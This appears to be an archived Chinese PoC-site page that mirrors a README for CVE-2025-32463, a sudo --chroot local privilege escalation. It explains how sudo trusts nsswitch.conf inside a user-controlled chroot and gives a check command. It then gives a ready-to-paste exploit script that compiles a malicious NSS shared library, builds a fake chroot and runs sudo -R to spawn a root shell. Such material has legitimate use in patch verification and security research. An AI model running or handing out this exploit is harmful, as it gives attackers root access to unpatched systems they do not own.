关联漏洞
标题:
Sudo 安全漏洞
(CVE-2025-32463)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
描述
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
介绍
# CVE-2025-32463
This repository contains an educational proof-of-concept (PoC) exploit for CVE-2025-32463, a critical privilege escalation vulnerability in the sudo command. The vulnerability allows a local user to gain root privileges on affected systems.
## CVE ID: CVE-2025-32463
- Type: Local Privilege Escalation (LPE)
- CVSS v3.1 Score: 9.3 (Critical) - `AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- Vendor: Sudo Project
- Affected Versions: Sudo versions prior to `1.9.17p1`
The vulnerability exists in the -R (--chroot) option of sudo. When this option is used with a user-controlled directory, sudo incorrectly trusts the `nsswitch.conf` file from within that chroot jail. This allows an attacker to specify a malicious shared library for the Name Service Switch (NSS) mechanism to load, resulting in code execution with root privileges.
The sudo command needs to resolve user and group identities. To do this, it uses the Name Service Switch (NSS) mechanism, which is configured by the /etc/nsswitch.conf file. This file specifies which libraries (e.g., libnss_files.so.2, libnss_systemd.so.2) should be used to look up different types of information (passwords, groups, hosts, etc.).
When the -R or --chroot option is used, sudo changes its root directory to the specified path before executing the command. The vulnerability is that sudo would then read the nsswitch.conf file from within this new chroot environment ($CHROOT/etc/nsswitch.conf) instead of using the trusted host system's /etc/nsswitch.conf.
## Testing Vulnerability
This is the fastest and safest way to check. It tries to use the `-R` option in a way that will fail, and you learn from the type of error message.
```
sudo -R nonexistent_directory nonexistent_command
```
If your system is VULNERABLE, you will see an error like this:
```bash
sudo: nonexistent_directory: No such file or directory
```
If your system is PATCHED, you will see an error like this:
```bash
sudo: you are not permitted to use the -R option with nonexistent_command
```
## Exploitation
Just run this in your terminal:
```bash
STAGE=$(mktemp -d /tmp/exploit.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > exploit.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void exploit(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);
}
EOF
# Create the chroot structure AND a lib directory inside it
mkdir -p exploit/etc exploit/lib
echo "passwd: /exploit123" > exploit/etc/nsswitch.conf
cp /etc/group exploit/etc
# Compile the library directly into the chroot's ./lib folder
gcc -shared -fPIC -Wl,-init,exploit -o exploit/lib/exploit123.so.2 exploit.c
echo "Pwned!"
sudo -R exploit exploit123
```
Disclaimer: This information is provided for educational and security testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
文件快照
[4.0K] /data/pocs/78202a15bb977415177fe32c9e17f9d02ac29d30
└── [2.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。